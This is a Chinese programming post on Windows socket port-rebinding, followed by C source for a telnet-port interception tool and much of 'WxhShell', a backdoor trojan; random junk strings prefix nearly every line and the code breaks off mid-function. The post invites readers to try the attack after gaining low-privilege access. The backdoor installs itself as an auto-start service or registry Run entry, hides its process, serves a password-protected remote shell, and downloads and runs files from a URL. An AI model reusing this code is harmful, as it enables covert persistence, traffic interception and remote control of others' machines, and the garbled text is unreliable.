在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:
at,XB.}Z] s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
SE1=>S%p '-Vt|O_Q saddr.sin_family = AF_INET;
.1Dg s=| ) vE~'W saddr.sin_addr.s_addr = htonl(INADDR_ANY);
t.i 8
2Q EM(gmWHij bind(s,(SOCKADDR *)&saddr,sizeof(saddr));
tEvut=k' u04kF^ 其实这当中存在在非常大的安全隐患,因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分,也就是说低级权限的用户是可以重绑定在高级权限如服务启动的端口上的,这是非常重大的一个安全隐患。
'c9]&B Yg||{ 这意味着什么?意味着可以进行如下的攻击:
_-K2/6zy #lL^?|M 1。一个木马绑定到一个已经合法存在的端口上进行端口的隐藏,他通过自己特定的包格式判断是不是自己的包,如果是自己处理,如果不是通过127.0.0.1的地址交给真正的服务器应用进行处理。
UGV+/zxIM ;n*.W|Uph 2。一个木马可以在低权限用户上绑定高权限的服务应用的端口,进行该处理信息的嗅探,本来在一个主机上监听一个SOCKET的通讯需要具备非常高的权限要求,但其实利用SOCKET重绑定,你可以轻易的监听具备这种SOCKET编程漏洞的通讯,而无须采用什么挂接,钩子或低层的驱动技术(这些都需要具备管理员权限才能达到)
=O5pY9UO TrEu'yxy8* 3。针对一些的特殊应用,可以发起中间人攻击,从低权限用户上获得信息或事实欺骗,如在guest权限下拦截telnet服务器的23端口,如果是采用NTLM加密认证,虽然你无法通过嗅探直接获取密码,但一旦有admin用户通过你登陆以后,你的应用就完全可以发起中间人攻击,扮演这个登陆的用户通过SOCKET发送高权限的命令,到达入侵的目的。
$r@zs'N E Nhl&J 4.对于构建的WEB服务器,入侵者只需要获得低级的权限,就可以完全达到更改网页目的,很简单,扮演你的服务器给予连接请求以其他信息的应答,甚至是基于电子商务上的欺骗,获取非法的数据。
Q{>+ft U <lPm1/8 其实,MS自己的很多服务的SOCKET编程都存在这样的问题,telnet,ftp,http的服务实现全部都可以利用这种方法进行攻击,在低权限用户上实现对SYSTEM应用的截听。包括W2K+SP3的IIS也都一样,那么如果你已经可以以低权限用户入侵或木马植入的话,而且对方又开启了这些服务的话,那就不妨一试。并且我估计还有很多第三方的服务也大多存在这个漏洞。
*v !9MU9[( BYL)nCc 解决的方法很简单,在编写如上应用的时候,绑定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求独占所有的端口地址,而不允许复用。这样其他人就无法复用这个端口了。
/T0F"e)Ci U]H#MiC! 下面就是一个简单的截听ms telnet服务器的例子,在GUEST用户下都能成功进行截听,剩余的就是大家根据自己的需要,进行一些特殊剪裁的问题了:如是隐藏,嗅探数据,高权限用户欺骗等。
) j#`r/ PUMXOTu] #include
2lH& #include
3Ei#q+7 #include
BLQ 6A< #include
{HltvO%8 DWORD WINAPI ClientThread(LPVOID lpParam);
$w`xvX int main()
pP&7rRhw {
Qb-M6ihcc WORD wVersionRequested;
;"5&b!=t DWORD ret;
l*(8i ^ WSADATA wsaData;
M2,l7
BOOL val;
-A^ _{4X SOCKADDR_IN saddr;
+SR+gE\s0 SOCKADDR_IN scaddr;
P^~yzI int err;
_7Ju SOCKET s;
4yy>jXDG SOCKET sc;
dd %6t int caddsize;
P9^Xm6QO HANDLE mt;
e5ZX DWORD tid;
24 ' J wVersionRequested = MAKEWORD( 2, 2 );
z% ?+AM)P err = WSAStartup( wVersionRequested, &wsaData );
@e.C"@G if ( err != 0 ) {
%HhnSi1K printf("error!WSAStartup failed!\n");
[Gb.
JO}X return -1;
\h/H#jZJ }
]v UwG--* saddr.sin_family = AF_INET;
cKca;SNql1 r,73C/*&/ //截听虽然也可以将地址指定为INADDR_ANY,但是要不能影响正常应用情况下,应该指定具体的IP,留下127.0.0.1给正常的服务应用,然后利用这个地址进行转发,就可以不影响对方正常应用了
RLjc&WhzXu *SJ_z(CZm saddr.sin_addr.s_addr = inet_addr("192.168.0.60");
{#vgtgBB saddr.sin_port = htons(23);
y&$A+peJ1 if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
gV's=cQ {
KxJ!,F{>H printf("error!socket failed!\n");
%v
M-mbX return -1;
x)DMPVB< }
{BN#h[#B{ val = TRUE;
g*AWE,%=| //SO_REUSEADDR选项就是可以实现端口重绑定的
*aM=Z+ if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
,q`\\d {
b|:YIXml printf("error!setsockopt failed!\n");
~g]Vw4pv return -1;
;WQve_\ }
Ua: sye //如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功,返回无权限的错误代码;
gD@){Ip //如果是想通过重利用端口达到隐藏的目的,就可以动态的测试当前已绑定的端口哪个可以成功,就说明具备这个漏洞,然后动态利用端口使得更隐蔽
lgL%u K) //其实UDP端口一样可以这样重绑定利用,这儿主要是以TELNET服务为例子进行攻击
BA:VPTZq N)X3XTY if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
IVY]Ek EG~ {
Woym/[i ret=GetLastError();
reu*53r] printf("error!bind failed!\n");
Q~
w|# return -1;
Rsm^Z!sn }
Vx u0F]% listen(s,2);
tCH!my_ while(1)
rpha!h>w1% {
q"lSZ;
'E caddsize = sizeof(scaddr);
-=Q*Ml#I //接受连接请求
+5*95-;0 sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
>1Ibc=}g if(sc!=INVALID_SOCKET)
)D7m,Wi+ {
D%pF;XY mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
`4J$Et%S if(mt==NULL)
K\Wkoi5 {
iOghb*aW printf("Thread Creat Failed!\n");
p?OoC break;
Dw.J2>uj }
BL}\D;+t }
)qw&%sO + CloseHandle(mt);
~TD0zAA& }
<)H9V-5aZ closesocket(s);
~qKY) "gG WSACleanup();
'n3uu1C return 0;
%J?xRv! }
Ffz,J6b DWORD WINAPI ClientThread(LPVOID lpParam)
JX;G<lev {
QA`sx SOCKET ss = (SOCKET)lpParam;
aeJHMHFc SOCKET sc;
Ee! 4xg unsigned char buf[4096];
{%H'z$|{ SOCKADDR_IN saddr;
%ntRG! long num;
/$?}YL, DWORD val;
Xl#ggub? DWORD ret;
![=yi
tB //如果是隐藏端口应用的话,可以在此处加一些判断
UB@+ck //如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发
Bnxm HGP#& saddr.sin_family = AF_INET;
F^;ez/Gl saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
V b ?oJhR saddr.sin_port = htons(23);
X.{S*E:$u if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
^jZbo{ {
m<Dy<((_I printf("error!socket failed!\n");
FTUv IbT return -1;
|/{=ww8| }
SY\ gXO8k val = 100;
",; H`V if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
~B?y{ {
:DNY7TvZ ret = GetLastError();
0S!K{xyR return -1;
k?^z;Tlvw }
$%#!bV if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
q>+k@>bk@ {
JPw.8|V)y ret = GetLastError();
]{@-HTt return -1;
( Erc3Ac8 }
S2&4g/ if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
+=</&Tm {
%7.30CA|# printf("error!socket connect failed!\n");
hRhe& ,v closesocket(sc);
YN F k closesocket(ss);
<PH#[dH return -1;
htF] W|z }
T(Eugl" while(1)
NZ0;5xGR {
HIZe0%WPw //下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上,并把应答的包再转发回去。
2^nxoye //如果是嗅探内容的话,可以再此处进行内容分析和记录
E ~<JC"] //如果是攻击如TELNET服务器,利用其高权限登陆用户的话,可以分析其登陆用户,然后利用发送特定的包以劫持的用户身份执行。
] (8[}CeL num = recv(ss,buf,4096,0);
G_,jgg7 if(num>0)
OQJ6e:BGt send(sc,buf,num,0);
-FaJ^CN~ else if(num==0)
/*mI<[xb break;
/h3RmUy num = recv(sc,buf,4096,0);
8&slu{M-
t if(num>0)
+cN8Y}V send(ss,buf,num,0);
A3/k@S-R2 else if(num==0)
1mG-} break;
kt:!
7 }
YIYmiv5 closesocket(ss);
EaN6^S= closesocket(sc);
N`e[:[ return 0 ;
XXa|BZ1RX }
cVF"!. 3
Za} b| AoxA+.O ==========================================================
U>N1Od4vTO N<}5A% 下边附上一个代码,,WXhSHELL
wbl& ZD{LXJ{Vm ==========================================================
6j}9V
L77 4,DeHJjAlE #include "stdafx.h"
t b}V5VH /k3:']G,s #include <stdio.h>
( a#BV}= #include <string.h>
v.qrz"98- #include <windows.h>
&tj!*k' #include <winsock2.h>
4.t-i5 #include <winsvc.h>
^ [@, #include <urlmon.h>
Ysv"
6b} a&? :P1$ #pragma comment (lib, "Ws2_32.lib")
. $vK&k #pragma comment (lib, "urlmon.lib")
7qS)c}Q\ Y}wyw8g/ #define MAX_USER 100 // 最大客户端连接数
G4"F+%. #define BUF_SOCK 200 // sock buffer
A*BeR0( #define KEY_BUFF 255 // 输入 buffer
Nj/
x. X xJ.M;SF4 #define REBOOT 0 // 重启
0</);g} #define SHUTDOWN 1 // 关机
Z,PPu&lmE/ =rdV ]{Wc #define DEF_PORT 5000 // 监听端口
tKXIk9e 'm$L Ij?@ #define REG_LEN 16 // 注册表键长度
)9]P MA?u #define SVC_LEN 80 // NT服务名长度
p4Z(^+Aa vnuN6M{ // 从dll定义API
Ig{0Z"> typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD);
nX8v+:&} typedef LONG (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG);
c-sfg>0 ^ typedef BOOL (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded);
b&U62iq typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize);
c7H^$_^ = }0y"F // wxhshell配置信息
pMM8-R'W- struct WSCFG {
]7A'7p$Y int ws_port; // 监听端口
493*{ char ws_passstr[REG_LEN]; // 口令
7b+6%fV int ws_autoins; // 安装标记, 1=yes 0=no
?}Y]|c^W char ws_regname[REG_LEN]; // 注册表键名
oQJtUP% char ws_svcname[REG_LEN]; // 服务名
pd$[8Rmj_ char ws_svcdisp[SVC_LEN]; // 服务显示名
_lq`a\7e char ws_svcdesc[SVC_LEN]; // 服务描述信息
Tw<q,O char ws_passmsg[SVC_LEN]; // 密码输入提示信息
1< ?4\?j int ws_downexe; // 下载执行标记, 1=yes 0=no
x
kD6Iw char ws_fileurl[SVC_LEN]; // 下载文件的 url, "
http://xxx/file.exe"
MF'JeM;H char ws_filenam[SVC_LEN]; // 下载后保存的文件名
6ik$B , W?VhO };
.T`%tJ-Em Tp2.VIoQ= // default Wxhshell configuration
1_G^w
qk struct WSCFG wscfg={DEF_PORT,
))Za&S*< "xuhuanlingzhe",
r<$y=B 1,
M"L=L5OH- "Wxhshell",
RxQ * "Wxhshell",
E"IZ6)Q "WxhShell Service",
Dw"\/p:-3 "Wrsky Windows CmdShell Service",
7zj{wp! "Please Input Your Password: ",
nO-#Q=H, 1,
h{qgEIk& "
http://www.wrsky.com/wxhshell.exe",
rPm x "Wxhshell.exe"
yB!dp;gM{ };
?e?!3Bx;EM t_1LL >R // 消息定义模块
/x *3}oI char *msg_ws_copyright="\n\rWxhShell v1.0 (C)2005
http://www.wrsky.com\n\rMake by 虚幻灵者\n\r";
\w8\1~# char *msg_ws_prompt="\n\r? for help\n\r#>";
7d\QB(~ char *msg_ws_cmd="\n\ri Install\n\rr Remove\n\rp Path\n\rb reboot\n\rd shutdown\n\rs Shell\n\rx exit\n\rq Quit\n\r\n\rDownload:\n\r#>
http://.../server.exe\n\r";
K(|}dl: char *msg_ws_ext="\n\rExit.";
C,eu9wOT char *msg_ws_end="\n\rQuit.";
lU]nd[x char *msg_ws_boot="\n\rReboot...";
7t3!)a|lI char *msg_ws_poff="\n\rShutdown...";
k}rbim char *msg_ws_down="\n\rSave to ";
}6ldjCT/, %
]U char *msg_ws_err="\n\rErr!";
vP,n(reM char *msg_ws_ok="\n\rOK!";
N$tGQ@
e' <)V_ char ExeFile[MAX_PATH];
NxILRKwO int nUser = 0;
0"SU_jQzv HANDLE handles[MAX_USER];
Iga024KR int OsIsNt;
w32y3~ LR3*G7 SERVICE_STATUS serviceStatus;
?q [T SERVICE_STATUS_HANDLE hServiceStatusHandle;
y1#1Ne_ 7}mFL* // 函数声明
wuo,kM int Install(void);
T
u'{&
int Uninstall(void);
19] E 5'AI int DownloadFile(char *sURL, SOCKET wsh);
!<h)w#>en int Boot(int flag);
xyxy`qR A void HideProc(void);
@(lh%@hO int GetOsVer(void);
l+b~KU7~l int Wxhshell(SOCKET wsl);
|vC~HJpuv' void TalkWithClient(void *cs);
{.]7!ISl5 int CmdShell(SOCKET sock);
2KZneS` int StartFromService(void);
;F Eqe49 int StartWxhshell(LPSTR lpCmdLine);
[fyLV` K)P%;X VOID WINAPI NTServiceMain( DWORD dwArgc, LPTSTR *lpszArgv );
!@"OB~ VOID WINAPI NTServiceHandler( DWORD fdwControl );
rZpXPI 3(UVg!t // 数据结构和表定义
%}T6]S)%u SERVICE_TABLE_ENTRY DispatchTable[] =
H;"4C8K7 {
!`r$"}g {wscfg.ws_svcname, NTServiceMain},
)M^
gT}M {NULL, NULL}
]_$[8#kg };
w2'5#`m 5-A\9UC*@ // 自我安装
vKR[&K{Z| int Install(void)
Yr|4Fl~U {
+H2Qk4XFB char svExeFile[MAX_PATH];
4Po_-4 HKEY key;
C9;kpqNG#u strcpy(svExeFile,ExeFile);
c*M}N?|6 ," ql5Q4 // 如果是win9x系统,修改注册表设为自启动
"Rl}VeDY if(!OsIsNt) {
K<J9~ if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
:zR!/5 RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
T8NxJmYqB RegCloseKey(key);
T^q
0'#/ if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
Mb=" Te>| RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
fXB0j;A RegCloseKey(key);
Z6m)tZVM return 0;
p b,. r }
:v 4]D4\o }
IRbfNq^: }
WF"k[2 else {
#LCb LgYq.>Nl9 // 如果是NT以上系统,安装为系统服务
[00m/fT6 SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE);
-F>jIgeC2v if (schSCManager!=0)
I}Q2Vu< {
T9& 1VW SC_HANDLE schService = CreateService
wQLSf{2 (
DTs;{c schSCManager,
+/\6=).\ wscfg.ws_svcname,
BerwI
7!= wscfg.ws_svcdisp,
l;V173W=& SERVICE_ALL_ACCESS,
tMe ~vq[ SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS ,
QS j]ZA SERVICE_AUTO_START,
xezcAwW SERVICE_ERROR_NORMAL,
%>s|j'{ svExeFile,
p4)Q&k! NULL,
wNX]7wMX NULL,
?%kV?eu' NULL,
8XbT`y NULL,
mVmGg, NULL
I2DpRMy );
J8~haim if (schService!=0)
9>$p {
$ulOp;~A% CloseServiceHandle(schService);
L=h'Qgk% CloseServiceHandle(schSCManager);
.sA.C]f strcpy(svExeFile,"SYSTEM\\CurrentControlSet\\Services\\");
<\FH fE strcat(svExeFile,wscfg.ws_svcname);
:H[6Lg\* if(RegOpenKey(HKEY_LOCAL_MACHINE,svExeFile,&key)==ERROR_SUCCESS) {
z$Qbj RegSetValueEx(key,"Description",0,REG_SZ,(BYTE *)wscfg.ws_svcdesc,lstrlen(wscfg.ws_svcdesc));
0(btA~'* RegCloseKey(key);
SY8C4vb'h return 0;
U<-D(J }
CH/rp4NeSy }
^W@5TkkBQq CloseServiceHandle(schSCManager);
"h ^Z }
)CyS#j#= }
2BobH_H J-4:H
gx return 1;
b>$S<td }
!%>7Dw(kt bN88ua}k{ // 自我卸载
iR0y"Cii int Uninstall(void)
O1kl70,`R {
]{L jRSV HKEY key;
&~w}_Fjk *owU)
if(!OsIsNt) {
yppo6HGD if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
D3A/l RegDeleteValue(key,wscfg.ws_regname);
5M_H
NWi4 RegCloseKey(key);
p<;0g9,1 if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
,Lt[\_ RegDeleteValue(key,wscfg.ws_regname);
|)G<,FJQE_ RegCloseKey(key);
Xry47a
) return 0;
RFH0 }
{BHO/q3 }
G#1GXFDO{ }
PxE3K-S)G else {
\|ao`MMaD< v.ui!|c SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);
b u"!jHPB if (schSCManager!=0)
a'z7(8$$ {
~v"L!=~G;a SC_HANDLE schService = OpenService( schSCManager, wscfg.ws_svcname, SERVICE_ALL_ACCESS);
m4yL@d,Yw if (schService!=0)
'%`:+]! {
fxIf|9Qi` if(DeleteService(schService)!=0) {
{zFMmPid CloseServiceHandle(schService);
[fIg{Q CloseServiceHandle(schSCManager);
7[wieYj{ return 0;
I2^8pTLh }
<^uBoKB/f CloseServiceHandle(schService);
bs'n+:X` }
]0\MmAJRn CloseServiceHandle(schSCManager);
8KNZ](Dj }
cs'{5!i] }
wa3}SB uM'Jp? return 1;
a@*\o+Su }
Qw)c$93 \^%}M!tan // 从指定url下载文件
)F2OT<]m, int DownloadFile(char *sURL, SOCKET wsh)
+2j AC r {
BF <ikilR HRESULT hr;
{qMIGwu char seps[]= "/";
@ry_nKr9 char *token;
]g&TKm char *file;
y^%y<~f char myURL[MAX_PATH];
AzxXB char myFILE[MAX_PATH];
7\q~%lDE 6MkP |vr6 strcpy(myURL,sURL);
;w[0t}dPl token=strtok(myURL,seps);
OydwE while(token!=NULL)
O0y_Lm\ {
09Cez\0 file=token;
0K2`-mL token=strtok(NULL,seps);
C2Tyoza }
xZv#Es%# ?3xzd P GetCurrentDirectory(MAX_PATH,myFILE);
jalg5`PU0 strcat(myFILE, "\\");
@|%2f@h strcat(myFILE, file);
#lW`{i send(wsh,myFILE,strlen(myFILE),0);
I
2|Bg,e send(wsh,"...",3,0);
&JI8]JmU) hr = URLDownloadToFile(0, sURL, myFILE, 0, 0);
W{gb:^;zb if(hr==S_OK)
6i~WcAs return 0;
e)O4^#i else
|H+Wed| return 1;
k)Qtfj}uij 680o)hh4m> }
:Zz
'1C {> 0wiH#!E // 系统电源模块
(ICd} int Boot(int flag)
\;"=QmRD%: {
}U9G HANDLE hToken;
u-5{U-^_ TOKEN_PRIVILEGES tkp;
(=@h23
vH /~f'}]W if(OsIsNt) {
xlg9TvvI OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
q%?in+l LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
H+Sz=tg5 tkp.PrivilegeCount = 1;
3;s\OW` tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
.h4 \Y A AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
Np0u,t%vs if(flag==REBOOT) {
q#=(e:aCb if(ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0))
*ppffz return 0;
"!%l/_p? }
nQ,HMXj else {
hFl^\$Re if(ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0))
9 j9TPyC/2 return 0;
MFAH%Z$ }
n#OB%@]<V }
J6FV]Gpv else {
?m?::R H if(flag==REBOOT) {
r|Tcfk]% if(ExitWindowsEx(EWX_REBOOT + EWX_FORCE,0))
K&K